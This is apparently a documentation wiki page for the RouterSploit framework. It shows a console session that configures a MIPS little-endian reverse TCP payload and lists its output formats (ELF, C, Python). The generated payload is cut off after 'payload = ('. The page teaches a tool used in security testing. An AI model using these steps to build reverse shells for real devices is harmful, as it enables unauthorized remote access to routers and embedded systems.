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Generating Payloads

Marcin Bury edited this page Oct 13, 2018 · 7 revisions

Generating Payloads

Example Payload Generation

rsf > use payloads/mipsle/reverse_tcp
rsf (MIPSLE Reverse TCP) > show options

Target options:

   Name      Current settings     Description
   ----      ----------------     -----------
   lhost                          Connect-back IP address
   lport     5555                 Connect-back TCP Port

Module options:

   Name         Current settings     Description
   ----         ----------------     -----------
   encoder                           Encoder
   output       python               Output type: elf/c/python
   filepath     /tmp/Pf8CV10g        Output file to write

rsf (MIPSLE Reverse TCP) > set lhost
[+] lhost =>
rsf (MIPSLE Reverse TCP) > set lport 4343
[+] lport => 4343
rsf (MIPSLE Reverse TCP) > run
[*] Running module...
[*] Generating payload
[+] Building payload for python
payload = (

Payload Generation

Payloads can be generated into following formats output:

  • elf - elf binary that can be executed on the target system (CPU architecture has to match)
  • c - payload that can be used as a part of C exploit and injected directly into memory
  • python - payload that can be used as a part of python exploit and injected directly into memory
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